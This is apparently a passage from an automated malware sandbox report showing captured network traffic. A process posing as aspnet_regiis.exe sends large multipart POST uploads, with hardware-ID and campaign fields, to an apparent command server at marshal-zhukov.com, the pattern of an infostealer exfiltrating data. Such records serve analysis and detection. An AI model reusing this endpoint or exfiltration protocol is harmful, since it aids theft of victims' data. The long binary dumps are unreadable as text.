                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JLFrcDvL9%2BYMgMU1wnAVUql1xuSL69doF0UegH5wPcMpACXzX2bsx71qJuqZQHTrQslo9NX6JN%2FpikEQF7AigHlR7jIftwxeupYvhQ9J%2FUa25BhRnEpY7X4x9mdZKpn7%2B7n2TyA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bcf5e842d41-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1361&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2847&recv_bytes=2129&delivery_rate=1960731&cwnd=251&unsent_bytes=0&cid=3d88b67f438c2abe&ts=503&x=0"
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC23INData Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                                                                            Data Ascii: 11ok 173.254.250.91
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                            Data Ascii: 0


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            15192.168.2.1049915188.114.97.34437232C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=NN7KU9FOLCX
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 554266
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: 2d 2d 4e 4e 37 4b 55 39 46 4f 4c 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 4e 4e 37 4b 55 39 46 4f 4c 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 4e 37 4b 55 39 46 4f 4c 43 58 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 0d 0a 2d 2d 4e 4e 37 4b 55 39 46 4f 4c 43 58 0d 0a 43
                                                                                                                                                                                                            Data Ascii: --NN7KU9FOLCXContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--NN7KU9FOLCXContent-Disposition: form-data; name="pid"1--NN7KU9FOLCXContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88--NN7KU9FOLCXC
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: 03 fa 01 35 7e ff 90 05 f3 4f 49 0a 1f e0 9d b0 46 82 49 bf 0b 16 f2 63 f5 5f aa 4d 1c db 56 6d 4a e5 06 23 c7 3a cd 40 76 1c 99 07 af d9 a6 a4 2e 65 3a 2a 6f e3 a7 73 87 95 e8 0c fb 74 df ce 7e 74 b3 95 3d 30 d7 de 57 ab d8 3c 65 49 be 71 4e 9b b0 4e 8a c5 1f 6d 18 b7 4d 76 36 ef 0d 35 4c c1 46 05 5a 69 08 bd ac 93 f3 ff 2d 7a fb 46 6a 9a 58 10 45 e6 d2 88 fb d6 b3 7d b8 9c 7c e5 3d 90 ac 0e 46 1a be e6 a8 53 e0 de 00 68 ed 60 90 3b 5c ea 06 ad 47 04 b4 be 70 00 a4 a1 60 6f 2c 23 6d 80 5a 81 87 55 31 6c be d3 b0 ca dc dd b9 ee 6f 8b 1f 16 8e ce 81 91 68 a5 6a 71 6b 78 ae fb 83 47 5b d5 c7 7e dd 4f 2b df 0c 20 da ac cc 5d 7e 6d 4c 80 3e 44 1b c2 b1 cf 12 c0 e0 90 62 5d 0a aa 61 b6 38 b6 cb 63 a8 84 94 dc 53 5b d1 6c 35 00 96 9f bb f2 5d 29 f3 73 b6 78 62
                                                                                                                                                                                                            Data Ascii: 5~OIFIc_MVmJ#:@v.e:*ost~t=0W<eIqNNmMv65LFZi-zFjXE}|=FSh`;\Gp`o,#mZU1lohjqkxG[~O+ ]~mL>Db]a8cS[l5])sxb
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: 71 bd 22 ce 8f 8d 3d fd 70 fc 0b 99 6e 84 6e a2 6e 44 eb ba 74 7e 3a 18 cb 7d 74 cb c1 dd 78 84 cb 09 95 2a 17 d7 e5 a0 1b ae e5 76 b1 54 d6 7f b5 8e da 60 b5 b4 e2 e1 51 67 2b ed 1e 9f 4f 04 8f 72 69 08 e2 16 c1 94 66 6a 27 10 e3 e3 c8 a7 7d af ed 7b c9 57 9b ac e4 94 12 56 f6 32 21 b4 2c b8 5b d4 c9 91 23 2f cb 7b fb 14 35 0a 53 2f 9a ed 81 ed e8 0b 46 62 ce 60 e2 de 3a cc 03 3f 01 67 1f 9c a0 7d ac b8 59 80 ed b9 d3 04 3e 08 f7 38 ec a0 23 5f 25 c6 2d 6a 06 f5 c6 5d 56 2e 8f 6b ae b4 d1 0b a5 c9 33 5d 9a c8 10 d9 5a d1 d4 9d 92 fd 23 44 7e 38 4c 4d ba 20 ce 49 59 9e 94 12 1e 80 cf db b6 ad 23 97 33 8b 76 13 7b 92 7f 66 c5 e9 4b cf cc f3 1c af a9 67 a5 6d 60 38 55 32 1a 6a d9 4b f4 99 51 c9 3a 5f 8e 3c bb 6d a6 fd 9a 41 79 1e 23 fd f6 a8 6c 6a 9e ac f2
                                                                                                                                                                                                            Data Ascii: q"=pnnnDt~:}tx*vT`Qg+Orifj'}{WV2!,[#/{5S/Fb`:?g}Y>8#_%-j]V.k3]Z#D~8LM IY#3v{fKgm`8U2jKQ:_<mAy#lj
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: 14 1e 18 bb db fb 15 3d 47 53 2e 50 87 5d 51 07 f1 5c 05 d0 c5 d2 a8 b2 ad 97 3f 77 cd 26 d2 ea c3 70 e2 b0 93 63 b7 87 9a 45 9f 0c 79 df 38 bf f4 c9 ff dd e4 19 fa e0 e0 85 9f 21 9a 64 5d 35 f4 14 dd 0c 47 71 7d 8c 40 e4 8d de 17 30 fc 48 7c 20 ae 14 88 21 ec 3b 11 3c d8 f2 b6 b5 32 ed 76 cd 4d 9d 2f c0 ca 15 af 99 0f 7d e4 a9 9d 55 be 9c 66 f8 45 26 97 7d f5 0e 81 97 72 ef 7e 6b 62 58 26 9b 3d f7 74 2a 8c 57 92 0c fc e7 f3 cc a7 a8 0b bc 86 d6 dd 5d 33 13 0c 21 a1 30 0b 2c f1 30 2d 8f 95 36 a5 cb 01 62 e8 43 34 2e da d4 ef 0a 5a 88 23 fd 7d a9 1e 5f 68 dd 74 e6 9d b7 72 6a d7 d6 83 0e e2 c4 3e bd cb 3f 11 c0 62 06 b7 04 33 57 48 2a ea 59 be 43 7f e9 aa c9 04 d0 0a 25 45 c7 4a 9f 85 e4 63 2d 86 65 ac c3 4d 1d 80 5f e7 32 1d 75 33 e6 1e 1c 20 48 7f 02 aa
                                                                                                                                                                                                            Data Ascii: =GS.P]Q\?w&pcEy8!d]5Gq}@0H| !;<2vM/}UfE&}r~kbX&=t*W]3!0,0-6bC4.Z#}_htrj>?b3WH*YC%EJc-eM_2u3 H
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: d3 63 68 d1 70 83 17 eb f7 74 a3 7f 62 9e 1d 37 85 b0 18 3a 31 d8 e0 4f d0 86 66 b4 91 9f 91 a1 ac 7d 7a 31 e4 32 db 8d b8 13 1e 5d ef dd f7 7d 48 02 91 cc 6d e4 94 aa b0 4e 6f 22 37 43 fb 45 3b 1a e7 57 37 03 60 af 92 3b fd cf 13 e2 69 bc 3b 98 30 2f c6 ef 11 de 4a d5 a3 17 6b 4e 4b cf 76 5d a6 19 d2 85 ef 74 16 21 d5 fa 34 36 20 f0 60 cf 68 8e 8e 26 c9 74 a3 70 4a e4 b2 aa 4c 6e 34 6f fb 1f 43 a7 7d cd 90 da 75 a2 e8 7d 11 bd c4 f6 86 7a 5b ce 15 b0 8d df 11 dd b8 75 4a 54 99 55 28 8a b9 4c 6c 2c 78 4a dc 94 d8 27 42 bf 89 0b 9e 03 45 ad c1 08 46 c1 81 f2 ad ad 52 9e 6f 6f 0f 8d b0 52 52 1e 79 d7 bc 47 b2 33 83 8b 4b c3 a2 28 8d 43 c3 cb 72 dc b8 23 49 21 1a 9a 4a 11 d4 69 1e 2f fa bd f9 c1 48 7c f5 f8 bc cf 3e fc 95 ff 47 f1 34 45 51 ff 9f 25 33 00 0d
                                                                                                                                                                                                            Data Ascii: chptb7:1Of}z12]}HmNo"7CE;W7`;i;0/JkNKv]t!46 `h&tpJLn4oC}u}z[uJTU(Ll,xJ'BEFRooRRyG3K(Cr#I!Ji/H|>G4EQ%3
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: ba fb 3f 24 74 e7 33 9a 96 eb f5 e3 78 de 7b 1e 50 1e 01 9b 61 41 e4 3e 5a 2d 06 58 05 35 a4 e4 51 55 b3 5b 55 8f 0d 05 0d fc d0 c9 be 63 5e a5 43 00 59 a6 79 af 1a dd 0f 72 c8 1f 90 4d 06 e4 a3 bc a0 f8 11 c6 b7 8f a3 ff 5c 67 de 3d 8f 0f 0c 5d 27 60 aa 6b 7b 68 a1 10 15 82 20 4f 5a de f2 d3 89 64 57 8c 05 44 f7 2b 06 13 10 99 93 81 df ba 2e 14 48 98 b5 f4 4d cd 15 d1 ad f1 71 da 8d d8 57 3d 3f 11 38 3e 75 b0 11 01 c8 65 50 27 7b d6 5d 72 dd 03 fd 84 96 7a aa 7e 5a eb 4f 10 0b a5 60 03 38 b0 ec cc d5 41 3d 72 09 a6 94 a7 1b 11 bd 84 24 f8 ae 22 12 3f 2c 08 31 2d 41 63 d6 bd 83 65 af ee d4 ff 31 d1 30 4f 4b b9 04 9c 53 3f ba b4 3e 83 09 7b 77 cb a5 5b c2 20 a4 93 37 cf 73 c2 82 19 32 6e 87 6f 69 77 28 89 3a 4d e7 83 bc 38 d6 f2 0d be c8 90 a5 25 a9 fd b5
                                                                                                                                                                                                            Data Ascii: ?$t3x{PaA>Z-X5QU[Uc^CYyrM\g=]'`k{h OZdWD+.HMqW=?8>ueP'{]rz~ZO`8A=r$"?,1-Ace10OKS?>{w[ 7s2noiw(:M8%
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: 25 c4 8b 41 32 11 f4 86 9a 3c df f8 f4 b1 17 e5 14 64 48 af 40 76 1e 11 75 1f 44 87 89 a7 b5 ee 28 ef bd f6 59 7d 4f f2 b0 95 0b d3 45 74 9e ca fe 5b 31 51 3c ec a6 72 41 a0 c0 e9 5f 68 a4 05 7d 23 c1 70 ae 71 80 52 22 7a f2 94 6d ba a9 d9 c9 18 f7 99 dc 00 a2 20 24 68 0b f4 81 49 6c 81 60 f0 5d 35 6a 86 54 b8 1f f6 72 d7 00 05 47 54 0e bb 8c d2 5c 05 08 e1 a1 38 17 7b b5 fb 1e 62 27 fe 83 f7 bf ab 97 be a4 73 7c ec 17 1c 29 d6 df 09 bb e9 48 d9 c9 7b 1e c5 bc 41 ef 36 b9 d9 fe c5 e3 6d c4 8f 87 a2 86 b7 5b 6d c7 d3 b4 e1 eb a3 58 6b 5c 62 82 97 19 91 40 25 96 f1 f1 c2 cd 84 b9 96 6b c9 6c e4 0c 06 14 0b d8 65 d6 0a 64 91 10 4b 3e 4d 69 11 35 d6 bc bc 29 10 ed f8 e1 95 04 e8 3c 2c 5d 7f e7 e8 e1 ee 2b dc 3f 34 ca da da b5 ae 46 ca 0e 6b 61 87 ad 4f 2a 28
                                                                                                                                                                                                            Data Ascii: %A2<dH@vuD(Y}OEt[1Q<rA_h}#pqR"zm $hIl`]5jTrGT\8{b's|)H{A6m[mXk\b@%kledK>Mi5)<,]+?4FkaO*(
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: d6 ed 96 5c 7d 94 51 da d4 74 8d c3 de c9 6b ae dc e1 25 0c dd 00 a4 49 19 75 01 18 f7 50 09 f0 63 5e 30 6a 0e ab d4 03 3d 8b b6 fe 84 70 d3 ce bb a7 0a c9 f7 02 de c9 3b 7f ab 40 1e d7 c1 4d b4 12 69 02 b2 71 c4 82 13 df 35 44 1f 36 fe f1 44 83 40 1e a1 e3 0a ce 6c f4 99 52 d5 c4 c0 0d 06 15 c5 2c 3e a4 7f 1b 03 82 d1 10 08 c1 6e eb 8f 7c d7 82 b7 63 90 c3 58 40 ca 52 4a 3c 0f 0a 24 04 f8 01 61 9d c8 0b e2 53 99 2b 45 30 ea 87 6c 01 38 cd 7a 4f 07 46 14 12 f2 6d a3 6a c3 3d dc c0 1d c1 74 2e 89 87 f5 2c ba c1 f0 51 ee fa 7b b9 08 9c 7b 99 2d 8a 7d 78 e1 c2 0b d2 eb f8 8a 1c 01 70 90 31 f6 24 70 7a b2 ea 0f 89 02 95 9d ef 70 1c 0a f2 83 fd d8 8c 29 1e cc d0 89 f6 6f 0c e3 dd 9d 45 ee df 50 06 48 5c b2 e1 1e 8d 0e 47 2e 20 0a 94 71 b9 af 60 96 0c e7 bf 86
                                                                                                                                                                                                            Data Ascii: \}Qtk%IuPc^0j=p;@Miq5D6D@lR,>n|cX@RJ<$aS+E0l8zOFmj=t.,Q{{-}xp1$pzp)oEPH\G. q`
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: b3 4e 0a 0d 9b 52 73 b6 b8 a7 05 36 10 06 5e 24 92 b9 f1 c1 1a 8f 29 4f e9 80 f4 8d 49 33 eb 1f 68 64 77 7f 15 26 9d a0 e5 fc 8f dd 13 e6 17 1c 81 c9 11 18 c7 56 a6 57 7a 36 78 8b 2c 8b 8b 84 75 ed 2f 7e fc 00 03 07 aa e0 97 91 13 6f 66 ca 66 3f 32 b6 11 41 da f5 13 8c f4 de a8 23 49 f2 ec dc 96 ad 26 45 cf 22 ac 34 b3 3c 7c 57 66 f6 35 ba 1f 45 a3 26 f6 7b 8c 1e 32 6a 8d 7f e3 58 84 db 7b 37 75 aa ae e5 af fa e2 ab 6e c5 6d 11 fc 3c 4f 3f 56 19 86 21 fb f8 83 e6 9e c9 19 cc 46 ad c7 9f 60 86 37 79 a6 76 20 b0 20 64 b8 22 77 c4 75 2d 7f e4 d6 50 17 af 24 36 64 e9 9b 45 99 b9 57 ba 4f c4 94 a9 c9 ef 2e db d6 ab 9d db db ae 35 6c 6f 8b 6b 9f 5e cc 91 61 f9 ac 7a 23 46 3f 04 7a 14 9f 4c 21 50 17 e2 37 de f9 05 a8 87 27 4e 90 14 be 2d 49 40 cc d9 c0 34 4b 12
                                                                                                                                                                                                            Data Ascii: NRs6^$)OI3hdw&VWz6x,u/~off?2A#I&E"4<|Wf5E&{2jX{7unm<O?V!F`7yv d"wu-P$6dEWO.5lok^az#F?zL!P7'N-I@4K
                                                                                                                                                                                                            2024-11-14 11:19:48 UTC15331OUTData Raw: ce fe da c8 db 71 ed 01 ee fc 5b 12 da a0 be f7 2b c4 3a 80 ac 7f 20 12 2d 34 a3 c1 48 66 83 84 30 29 12 01 5c 74 64 bc e4 f1 c8 9a cb 7d 3b df b5 07 91 c0 fe f1 af 32 ae 2e f3 d7 fe 5e 0d 98 f9 c8 d8 36 1b cf dc 6d a4 78 2f 9d ae 69 66 1e 65 cf 1c 36 35 c2 c8 11 da 05 0b 97 b2 05 de ab 27 26 c4 0d 9a 6d e2 d7 71 7a ce 51 b2 54 77 0b 33 f0 a8 87 fb 77 94 77 9c 29 ac b8 71 a6 26 f4 8e 70 71 18 36 08 f5 33 c7 21 47 5e 5d fe 78 d0 70 e0 8f 27 eb 8b 5f 7d 54 fd f0 cf 9a cd 48 ab 56 09 9b 43 4d 63 6d 1b de 11 fa 18 9a 9b ae 5d b0 dc 70 e0 de 59 91 88 95 4f b2 9b a7 9f ed 3c 2d f4 c7 72 25 50 95 25 bb e7 5c 40 0d a5 48 76 20 dd 1e ef 8c 5e b1 64 db d8 06 df e2 84 fc b8 91 24 a9 2f 2e a8 68 01 47 f1 d8 b8 94 28 c6 13 69 91 65 f1 b5 49 f5 8c e3 bb a3 54 e4 1e 7f
                                                                                                                                                                                                            Data Ascii: q[+: -4Hf0)\td};2.^6mx/ife65'&mqzQTw3ww)q&pq63!G^]xp'_}THVCMcm]pYO<-r%P%\@Hv ^d$/.hG(ieIT
                                                                                                                                                                                                            2024-11-14 11:19:51 UTC1024INHTTP/1.1 200 OK
                                                                                                                                                                                                            Date: Thu, 14 Nov 2024 11:19:50 GMT
                                                                                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                            Set-Cookie: PHPSESSID=dspvkvv0h6aj03jp93a36u724j; expires=Mon, 10-Mar-2025 05:06:29 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                            Pragma: no-cache
                                                                                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                                                                                            vary: accept-encoding
                                                                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PUd9FimeRvYJak0%2B0lk1xn%2BM3bNnKg1t7fU1h23JQQk6n39pMtqtfDDH2uHfR5mbu%2FQnC2LVBtpw4wfOTyXyITgiDXXzZg3R3NGJ8T%2BQcxjfBFuYf0zgIGF0SAGrdaZULyYd%2Faw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                            CF-RAY: 8e269bcfccc73470-DFW
                                                                                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=966&sent=218&recv=602&lost=0&retrans=0&sent_bytes=2848&recv_bytes=556764&delivery_rate=2867326&cwnd=251&unsent_bytes=0&cid=dfd976a6ed4a98eb&ts=2610&x=0"


                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                            16192.168.2.1049926188.114.97.34437188C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC283OUTPOST /api HTTP/1.1
                                                                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                                                                            Content-Type: multipart/form-data; boundary=ZOFPZ2OSGLP84B3U
                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                            Content-Length: 555209
                                                                                                                                                                                                            Host: marshal-zhukov.com
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 2d 2d 5a 4f 46 50 5a 32 4f 53 47 4c 50 38 34 42 33 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 37 35 31 30 46 44 33 35 30 33 42 36 35 35 35 34 31 35 38 31 31 46 43 41 32 36 32 30 32 46 46 0d 0a 2d 2d 5a 4f 46 50 5a 32 4f 53 47 4c 50 38 34 42 33 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 5a 4f 46 50 5a 32 4f 53 47 4c 50 38 34 42 33 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 42 56 6e 55 71 6f 2d 2d 40 6e 6d 72 7a 76 38 38 0d 0a 2d
                                                                                                                                                                                                            Data Ascii: --ZOFPZ2OSGLP84B3UContent-Disposition: form-data; name="hwid"47510FD3503B6555415811FCA26202FF--ZOFPZ2OSGLP84B3UContent-Disposition: form-data; name="pid"1--ZOFPZ2OSGLP84B3UContent-Disposition: form-data; name="lid"BVnUqo--@nmrzv88-
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: e6 9d f5 2e e3 4f 6a d2 0c 57 9f 3d 87 27 e9 a1 fd d7 3d 2e 9d ff ed 80 17 03 fa 01 35 7e ff 90 05 f3 4f 49 0a 1f e0 9d b0 46 82 49 bf 0b 16 f2 63 f5 5f aa 4d 1c db 56 6d 4a e5 06 23 c7 3a cd 40 76 1c 99 07 af d9 a6 a4 2e 65 3a 2a 6f e3 a7 73 87 95 e8 0c fb 74 df ce 7e 74 b3 95 3d 30 d7 de 57 ab d8 3c 65 49 be 71 4e 9b b0 4e 8a c5 1f 6d 18 b7 4d 76 36 ef 0d 35 4c c1 46 05 5a 69 08 bd ac 93 f3 ff 2d 7a fb 46 6a 9a 58 10 45 e6 d2 88 fb d6 b3 7d b8 9c 7c e5 3d 90 ac 0e 46 1a be e6 a8 53 e0 de 00 68 ed 60 90 3b 5c ea 06 ad 47 04 b4 be 70 00 a4 a1 60 6f 2c 23 6d 80 5a 81 87 55 31 6c be d3 b0 ca dc dd b9 ee 6f 8b 1f 16 8e ce 81 91 68 a5 6a 71 6b 78 ae fb 83 47 5b d5 c7 7e dd 4f 2b df 0c 20 da ac cc 5d 7e 6d 4c 80 3e 44 1b c2 b1 cf 12 c0 e0 90 62 5d 0a aa 61 b6
                                                                                                                                                                                                            Data Ascii: .OjW='=.5~OIFIc_MVmJ#:@v.e:*ost~t=0W<eIqNNmMv65LFZi-zFjXE}|=FSh`;\Gp`o,#mZU1lohjqkxG[~O+ ]~mL>Db]a
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: a8 d8 1d 26 0c 8b c0 b2 24 99 b8 d2 a6 e9 e3 ad f2 28 9d 9c 99 a0 50 bd c1 71 bd 22 ce 8f 8d 3d fd 70 fc 0b 99 6e 84 6e a2 6e 44 eb ba 74 7e 3a 18 cb 7d 74 cb c1 dd 78 84 cb 09 95 2a 17 d7 e5 a0 1b ae e5 76 b1 54 d6 7f b5 8e da 60 b5 b4 e2 e1 51 67 2b ed 1e 9f 4f 04 8f 72 69 08 e2 16 c1 94 66 6a 27 10 e3 e3 c8 a7 7d af ed 7b c9 57 9b ac e4 94 12 56 f6 32 21 b4 2c b8 5b d4 c9 91 23 2f cb 7b fb 14 35 0a 53 2f 9a ed 81 ed e8 0b 46 62 ce 60 e2 de 3a cc 03 3f 01 67 1f 9c a0 7d ac b8 59 80 ed b9 d3 04 3e 08 f7 38 ec a0 23 5f 25 c6 2d 6a 06 f5 c6 5d 56 2e 8f 6b ae b4 d1 0b a5 c9 33 5d 9a c8 10 d9 5a d1 d4 9d 92 fd 23 44 7e 38 4c 4d ba 20 ce 49 59 9e 94 12 1e 80 cf db b6 ad 23 97 33 8b 76 13 7b 92 7f 66 c5 e9 4b cf cc f3 1c af a9 67 a5 6d 60 38 55 32 1a 6a d9 4b
                                                                                                                                                                                                            Data Ascii: &$(Pq"=pnnnDt~:}tx*vT`Qg+Orifj'}{WV2!,[#/{5S/Fb`:?g}Y>8#_%-j]V.k3]Z#D~8LM IY#3v{fKgm`8U2jK
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 72 3f ff 2b be 46 97 1a b2 06 53 0d 9d 40 50 3a 86 7e d8 b4 d4 9e 95 17 11 14 1e 18 bb db fb 15 3d 47 53 2e 50 87 5d 51 07 f1 5c 05 d0 c5 d2 a8 b2 ad 97 3f 77 cd 26 d2 ea c3 70 e2 b0 93 63 b7 87 9a 45 9f 0c 79 df 38 bf f4 c9 ff dd e4 19 fa e0 e0 85 9f 21 9a 64 5d 35 f4 14 dd 0c 47 71 7d 8c 40 e4 8d de 17 30 fc 48 7c 20 ae 14 88 21 ec 3b 11 3c d8 f2 b6 b5 32 ed 76 cd 4d 9d 2f c0 ca 15 af 99 0f 7d e4 a9 9d 55 be 9c 66 f8 45 26 97 7d f5 0e 81 97 72 ef 7e 6b 62 58 26 9b 3d f7 74 2a 8c 57 92 0c fc e7 f3 cc a7 a8 0b bc 86 d6 dd 5d 33 13 0c 21 a1 30 0b 2c f1 30 2d 8f 95 36 a5 cb 01 62 e8 43 34 2e da d4 ef 0a 5a 88 23 fd 7d a9 1e 5f 68 dd 74 e6 9d b7 72 6a d7 d6 83 0e e2 c4 3e bd cb 3f 11 c0 62 06 b7 04 33 57 48 2a ea 59 be 43 7f e9 aa c9 04 d0 0a 25 45 c7 4a 9f
                                                                                                                                                                                                            Data Ascii: r?+FS@P:~=GS.P]Q\?w&pcEy8!d]5Gq}@0H| !;<2vM/}UfE&}r~kbX&=t*W]3!0,0-6bC4.Z#}_htrj>?b3WH*YC%EJ
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: 11 95 b2 ad 22 44 4d 14 55 ca eb dc 20 25 36 61 2f b4 8c 7c df 35 fd 47 09 d3 63 68 d1 70 83 17 eb f7 74 a3 7f 62 9e 1d 37 85 b0 18 3a 31 d8 e0 4f d0 86 66 b4 91 9f 91 a1 ac 7d 7a 31 e4 32 db 8d b8 13 1e 5d ef dd f7 7d 48 02 91 cc 6d e4 94 aa b0 4e 6f 22 37 43 fb 45 3b 1a e7 57 37 03 60 af 92 3b fd cf 13 e2 69 bc 3b 98 30 2f c6 ef 11 de 4a d5 a3 17 6b 4e 4b cf 76 5d a6 19 d2 85 ef 74 16 21 d5 fa 34 36 20 f0 60 cf 68 8e 8e 26 c9 74 a3 70 4a e4 b2 aa 4c 6e 34 6f fb 1f 43 a7 7d cd 90 da 75 a2 e8 7d 11 bd c4 f6 86 7a 5b ce 15 b0 8d df 11 dd b8 75 4a 54 99 55 28 8a b9 4c 6c 2c 78 4a dc 94 d8 27 42 bf 89 0b 9e 03 45 ad c1 08 46 c1 81 f2 ad ad 52 9e 6f 6f 0f 8d b0 52 52 1e 79 d7 bc 47 b2 33 83 8b 4b c3 a2 28 8d 43 c3 cb 72 dc b8 23 49 21 1a 9a 4a 11 d4 69 1e 2f
                                                                                                                                                                                                            Data Ascii: "DMU %6a/|5Gchptb7:1Of}z12]}HmNo"7CE;W7`;i;0/JkNKv]t!46 `h&tpJLn4oC}u}z[uJTU(Ll,xJ'BEFRooRRyG3K(Cr#I!Ji/
                                                                                                                                                                                                            2024-11-14 11:19:50 UTC15331OUTData Raw: e1 67 6b 26 f5 3c b8 9b 16 15 b1 c3 bf 35 92 60 63 cc 3d 31 34 7f 45 40 12 ba fb 3f 24 74 e7 33 9a 96 eb f5 e3 78 de 7b 1e 50 1e 01 9b 61 41 e4 3e 5a 2d 06 58 05 35 a4 e4 51 55 b3 5b 55 8f 0d 05 0d fc d0 c9 be 63 5e a5 43 00 59 a6 79 af 1a dd 0f 72 c8 1f 90 4d 06 e4 a3 bc a0 f8 11 c6 b7 8f a3 ff 5c 67 de 3d 8f 0f 0c 5d 27 60 aa 6b 7b 68 a1 10 15 82 20 4f 5a de f2 d3 89 64 57 8c 05 44 f7 2b 06 13 10 99 93 81 df ba 2e 14 48 98 b5 f4 4d cd 15 d1 ad f1 71 da 8d d8 57 3d 3f 11 38 3e 75 b0 11 01 c8 65 50 27 7b d6 5d 72 dd 03 fd 84 96 7a aa 7e 5a eb 4f 10 0b a5 60 03 38 b0 ec cc d5 41 3d 72 09 a6 94 a7 1b 11 bd 84 24 f8 ae 22 12 3f 2c 08 31 2d 41 63 d6 bd 83 65 af ee d4 ff 31 d1 30 4f 4b b9 04 9c 53 3f ba b4 3e 83 09 7b 77 cb a5 5b c2 20 a4 93 37 cf 73 c2 82 19
